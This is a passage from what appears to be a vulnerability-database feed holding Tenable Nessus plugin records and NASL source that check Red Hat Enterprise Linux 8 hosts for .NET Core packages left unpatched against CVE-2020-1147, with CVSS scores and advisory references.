"p-cpe:/a:redhat:enterprise_linux:dotnet-host-fxr-2.1", "p-cpe:/a:redhat:enterprise_linux:dotnet-runtime-2.1", "p-cpe:/a:redhat:enterprise_linux:dotnet-sdk-2.1", "p-cpe:/a:redhat:enterprise_linux:dotnet-sdk-2.1.5xx"], "id": "REDHAT-RHSA-2020-2989.NASL", "href": "https://www.tenable.com/plugins/nessus/138606", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:2989. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138606);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/23\");\n\n script_cve_id(\"CVE-2020-1147\");\n script_xref(name:\"RHSA\", value:\"2020:2989\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"IAVA\", value:\"2020-A-0305-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0304-S\");\n\n script_name(english:\"RHEL 8 : .NET Core (RHSA-2020:2989)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2020:2989 advisory.\n\n - dotnet: XML source markup processing remote code execution (CVE-2020-1147)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-1147\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:2989\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1856929\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1147\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint DataSet / DataTable Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(502);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dotnet\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dotnet-host\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dotnet-host-fxr-2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dotnet-runtime-2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dotnet-sdk-2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dotnet-sdk-2.1.5xx\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'eq', os_version: os_ver, rhel_version: '8.0')) audit(AUDIT_OS_NOT, 'Red Hat 8.0', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/e4s/rhel8/8.0/x86_64/appstream/debug',\n 'content/e4s/rhel8/8.0/x86_64/appstream/os',\n 'content/e4s/rhel8/8.0/x86_64/appstream/source/SRPMS',\n 'content/e4s/rhel8/8.0/x86_64/baseos/debug',\n 'content/e4s/rhel8/8.0/x86_64/baseos/os',\n 'content/e4s/rhel8/8.0/x86_64/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.0/x86_64/highavailability/debug',\n 'content/e4s/rhel8/8.0/x86_64/highavailability/os',\n 'content/e4s/rhel8/8.0/x86_64/highavailability/source/SRPMS',\n 'content/e4s/rhel8/8.0/x86_64/sap-solutions/debug',\n 'content/e4s/rhel8/8.0/x86_64/sap-solutions/os',\n 'content/e4s/rhel8/8.0/x86_64/sap-solutions/source/SRPMS',\n 'content/e4s/rhel8/8.0/x86_64/sap/debug',\n 'content/e4s/rhel8/8.0/x86_64/sap/os',\n 'content/e4s/rhel8/8.0/x86_64/sap/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'dotnet-2.1.516-1.el8_0', 'sp':'0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-host-2.1.20-1.el8_0', 'sp':'0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-host-fxr-2.1-2.1.20-1.el8_0', 'sp':'0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-runtime-2.1-2.1.20-1.el8_0', 'sp':'0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-sdk-2.1-2.1.516-1.el8_0', 'sp':'0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-sdk-2.1.5xx-2.1.516-1.el8_0', 'sp':'0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp'])) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var subscription_caveat = '\\n' +\n 'NOTE: This vulnerability check contains fixes that apply to\\n' +\n 'packages only available in the Red Hat Enterprise Linux\\n' +\n 'Update Services for SAP Solutions repository.\\n' +\n 'Access to this repository requires a paid RHEL subscription.\\n';\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = subscription_caveat + rpm_report_get() + redhat_report_repo_caveat();\n else extra = subscription_caveat + rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'dotnet / dotnet-host / dotnet-host-fxr-2.1 / dotnet-runtime-2.1 / etc');\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-24T14:25:57", "description": "The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2020:2954 advisory.\n\n - dotnet: XML source markup processing remote code execution (CVE-2020-1147)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-20T00:00:00", "type": "nessus", "title": "RHEL 8 : .NET Core 3.1 (RHSA-2020:2954)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1147"], "modified": "2023-01-23T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:8", "cpe:/o:redhat:rhel_aus:8.2", "cpe:/o:redhat:rhel_aus:8.4", "cpe:/o:redhat:rhel_aus:8.6", "cpe:/o:redhat:rhel_e4s:8.2", "cpe:/o:redhat:rhel_e4s:8.4", "cpe:/o:redhat:rhel_e4s:8.6", "cpe:/o:redhat:rhel_eus:8.2", "cpe:/o:redhat:rhel_eus:8.4", "cpe:/o:redhat:rhel_eus:8.6", "cpe:/o:redhat:rhel_tus:8.2", "cpe:/o:redhat:rhel_tus:8.4", "cpe:/o:redhat:rhel_tus:8.6", "p-cpe:/a:redhat:enterprise_linux:aspnetcore-runtime-3.1", "p-cpe:/a:redhat:enterprise_linux:aspnetcore-targeting-pack-3.1", "p-cpe:/a:redhat:enterprise_linux:dotnet", "p-cpe:/a:redhat:enterprise_linux:dotnet-apphost-pack-3.1", "p-cpe:/a:redhat:enterprise_linux:dotnet-host", "p-cpe:/a:redhat:enterprise_linux:dotnet-hostfxr-3.1", "p-cpe:/a:redhat:enterprise_linux:dotnet-runtime-3.1", "p-cpe:/a:redhat:enterprise_linux:dotnet-sdk-3.1", "p-cpe:/a:redhat:enterprise_linux:dotnet-targeting-pack-3.1", "p-cpe:/a:redhat:enterprise_linux:dotnet-templates-3.1", "p-cpe:/a:redhat:enterprise_linux:netstandard-targeting-pack-2.1"], "id": "REDHAT-RHSA-2020-2954.NASL", "href": "https://www.tenable.com/plugins/nessus/138609", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:2954. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138609);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/23\");\n\n script_cve_id(\"CVE-2020-1147\");\n script_xref(name:\"RHSA\", value:\"2020:2954\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"IAVA\", value:\"2020-A-0305-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0304-S\");\n\n script_name(english:\"RHEL 8 : .NET Core 3.1 (RHSA-2020:2954)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2020:2954 advisory.\n\n - dotnet: XML source markup processing remote code execution (CVE-2020-1147)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-1147\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:2954\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1856929\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1147\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint DataSet / DataTable Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(502);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_aus:8.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_aus:8.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_aus:8.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:8.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:8.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:8.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:8.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:8.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:8.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_tus:8.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_tus:8.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_tus:8.6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:aspnetcore-runtime-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:aspnetcore-targeting-pack-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dotnet\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dotnet-apphost-pack-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dotnet-host\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dotnet-hostfxr-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dotnet-runtime-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dotnet-sdk-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dotnet-targeting-pack-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dotnet-templates-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:netstandard-targeting-pack-2.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'Red Hat 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/aus/rhel8/8.2/x86_64/appstream/debug',\n 'content/aus/rhel8/8.2/x86_64/appstream/os',\n 'content/aus/rhel8/8.2/x86_64/appstream/source/SRPMS',\n 'content/aus/rhel8/8.2/x86_64/baseos/debug',\n 'content/aus/rhel8/8.2/x86_64/baseos/os',\n 'content/aus/rhel8/8.2/x86_64/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.2/x86_64/appstream/debug',\n 'content/e4s/rhel8/8.2/x86_64/appstream/os',\n 'content/e4s/rhel8/8.2/x86_64/appstream/source/SRPMS',\n 'content/e4s/rhel8/8.2/x86_64/baseos/debug',\n 'content/e4s/rhel8/8.2/x86_64/baseos/os',\n 'content/e4s/rhel8/8.2/x86_64/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.2/x86_64/highavailability/debug',\n 'content/e4s/rhel8/8.2/x86_64/highavailability/os',\n 'content/e4s/rhel8/8.2/x86_64/highavailability/source/SRPMS',\n 'content/e4s/rhel8/8.2/x86_64/sap-solutions/debug',\n 'content/e4s/rhel8/8.2/x86_64/sap-solutions/os',\n 'content/e4s/rhel8/8.2/x86_64/sap-solutions/source/SRPMS',\n 'content/e4s/rhel8/8.2/x86_64/sap/debug',\n 'content/e4s/rhel8/8.2/x86_64/sap/os',\n 'content/e4s/rhel8/8.2/x86_64/sap/source/SRPMS',\n 'content/eus/rhel8/8.2/x86_64/appstream/debug',\n 'content/eus/rhel8/8.2/x86_64/appstream/os',\n 'content/eus/rhel8/8.2/x86_64/appstream/source/SRPMS',\n 'content/eus/rhel8/8.2/x86_64/baseos/debug',\n 'content/eus/rhel8/8.2/x86_64/baseos/os',\n 'content/eus/rhel8/8.2/x86_64/baseos/source/SRPMS',\n 'content/eus/rhel8/8.2/x86_64/codeready-builder/debug',\n 'content/eus/rhel8/8.2/x86_64/codeready-builder/os',\n 'content/eus/rhel8/8.2/x86_64/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.2/x86_64/highavailability/debug',\n 'content/eus/rhel8/8.2/x86_64/highavailability/os',\n 'content/eus/rhel8/8.2/x86_64/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.2/x86_64/resilientstorage/debug',\n 'content/eus/rhel8/8.2/x86_64/resilientstorage/os',\n 'content/eus/rhel8/8.2/x86_64/resilientstorage/source/SRPMS',\n 'content/eus/rhel8/8.2/x86_64/sap-solutions/debug',\n 'content/eus/rhel8/8.2/x86_64/sap-solutions/os',\n 'content/eus/rhel8/8.2/x86_64/sap-solutions/source/SRPMS',\n 'content/eus/rhel8/8.2/x86_64/sap/debug',\n 'content/eus/rhel8/8.2/x86_64/sap/os',\n 'content/eus/rhel8/8.2/x86_64/sap/source/SRPMS',\n 'content/eus/rhel8/8.2/x86_64/supplementary/debug',\n 'content/eus/rhel8/8.2/x86_64/supplementary/os',\n 'content/eus/rhel8/8.2/x86_64/supplementary/source/SRPMS',\n 'content/tus/rhel8/8.2/x86_64/appstream/debug',\n 'content/tus/rhel8/8.2/x86_64/appstream/os',\n 'content/tus/rhel8/8.2/x86_64/appstream/source/SRPMS',\n 'content/tus/rhel8/8.2/x86_64/baseos/debug',\n 'content/tus/rhel8/8.2/x86_64/baseos/os',\n 'content/tus/rhel8/8.2/x86_64/baseos/source/SRPMS',\n 'content/tus/rhel8/8.2/x86_64/highavailability/debug',\n 'content/tus/rhel8/8.2/x86_64/highavailability/os',\n 'content/tus/rhel8/8.2/x86_64/highavailability/source/SRPMS',\n 'content/tus/rhel8/8.2/x86_64/nfv/debug',\n 'content/tus/rhel8/8.2/x86_64/nfv/os',\n 'content/tus/rhel8/8.2/x86_64/nfv/source/SRPMS',\n 'content/tus/rhel8/8.2/x86_64/rt/debug',\n 'content/tus/rhel8/8.2/x86_64/rt/os',\n 'content/tus/rhel8/8.2/x86_64/rt/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'aspnetcore-runtime-3.1-3.1.6-1.el8_2', 'sp':'2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'aspnetcore-targeting-pack-3.1-3.1.6-1.el8_2', 'sp':'2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-3.1.106-1.el8_2', 'sp':'2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-apphost-pack-3.1-3.1.6-1.el8_2', 'sp':'2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-host-3.1.6-1.el8_2', 'sp':'2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-hostfxr-3.1-3.1.6-1.el8_2', 'sp':'2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-runtime-3.1-3.1.6-1.el8_2', 'sp':'2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-sdk-3.1-3.1.106-1.el8_2', 'sp':'2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-targeting-pack-3.1-3.1.6-1.el8_2', 'sp':'2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-templates-3.1-3.1.106-1.el8_2', 'sp':'2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'netstandard-targeting-pack-2.1-3.1.106-1.el8_2', 'sp':'2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n ]\n },\n {\n 'repo_relative_urls': [\n 'content/aus/rhel8/8.4/x86_64/appstream/debug',\n 'content/aus/rhel8/8.4/x86_64/appstream/os',\n 'content/aus/rhel8/8.4/x86_64/appstream/source/SRPMS',\n 'content/aus/rhel8/8.4/x86_64/baseos/debug',\n 'content/aus/rhel8/8.4/x86_64/baseos/os',\n 'content/aus/rhel8/8.4/x86_64/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.4/x86_64/appstream/debug',\n 'content/e4s/rhel8/8.4/x86_64/appstream/os',\n 'content/e4s/rhel8/8.4/x86_64/appstream/source/SRPMS',\n 'content/e4s/rhel8/8.4/x86_64/baseos/debug',\n 'content/e4s/rhel8/8.4/x86_64/baseos/os',\n 'content/e4s/rhel8/8.4/x86_64/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.4/x86_64/highavailability/debug',\n 'content/e4s/rhel8/8.4/x86_64/highavailability/os',\n 'content/e4s/rhel8/8.4/x86_64/highavailability/source/SRPMS',\n 'content/e4s/rhel8/8.4/x86_64/sap-solutions/debug',\n 'content/e4s/rhel8/8.4/x86_64/sap-solutions/os',\n 'content/e4s/rhel8/8.4/x86_64/sap-solutions/source/SRPMS',\n 'content/e4s/rhel8/8.4/x86_64/sap/debug',\n 'content/e4s/rhel8/8.4/x86_64/sap/os',\n 'content/e4s/rhel8/8.4/x86_64/sap/source/SRPMS',\n 'content/eus/rhel8/8.4/x86_64/appstream/debug',\n 'content/eus/rhel8/8.4/x86_64/appstream/os',\n 'content/eus/rhel8/8.4/x86_64/appstream/source/SRPMS',\n 'content/eus/rhel8/8.4/x86_64/baseos/debug',\n 'content/eus/rhel8/8.4/x86_64/baseos/os',\n 'content/eus/rhel8/8.4/x86_64/baseos/source/SRPMS',\n 'content/eus/rhel8/8.4/x86_64/codeready-builder/debug',\n 'content/eus/rhel8/8.4/x86_64/codeready-builder/os',\n 'content/eus/rhel8/8.4/x86_64/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.4/x86_64/highavailability/debug',\n 'content/eus/rhel8/8.4/x86_64/highavailability/os',\n 'content/eus/rhel8/8.4/x86_64/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.4/x86_64/resilientstorage/debug',\n 'content/eus/rhel8/8.4/x86_64/resilientstorage/os',\n 'content/eus/rhel8/8.4/x86_64/resilientstorage/source/SRPMS',\n 'content/eus/rhel8/8.4/x86_64/sap-solutions/debug',\n 'content/eus/rhel8/8.4/x86_64/sap-solutions/os',\n 'content/eus/rhel8/8.4/x86_64/sap-solutions/source/SRPMS',\n 'content/eus/rhel8/8.4/x86_64/sap/debug',\n 'content/eus/rhel8/8.4/x86_64/sap/os',\n 'content/eus/rhel8/8.4/x86_64/sap/source/SRPMS',\n 'content/eus/rhel8/8.4/x86_64/supplementary/debug',\n 'content/eus/rhel8/8.4/x86_64/supplementary/os',\n 'content/eus/rhel8/8.4/x86_64/supplementary/source/SRPMS',\n 'content/tus/rhel8/8.4/x86_64/appstream/debug',\n 'content/tus/rhel8/8.4/x86_64/appstream/os',\n 'content/tus/rhel8/8.4/x86_64/appstream/source/SRPMS',\n 'content/tus/rhel8/8.4/x86_64/baseos/debug',\n 'content/tus/rhel8/8.4/x86_64/baseos/os',\n 'content/tus/rhel8/8.4/x86_64/baseos/source/SRPMS',\n 'content/tus/rhel8/8.4/x86_64/highavailability/debug',\n 'content/tus/rhel8/8.4/x86_64/highavailability/os',\n 'content/tus/rhel8/8.4/x86_64/highavailability/source/SRPMS',\n 'content/tus/rhel8/8.4/x86_64/nfv/debug',\n 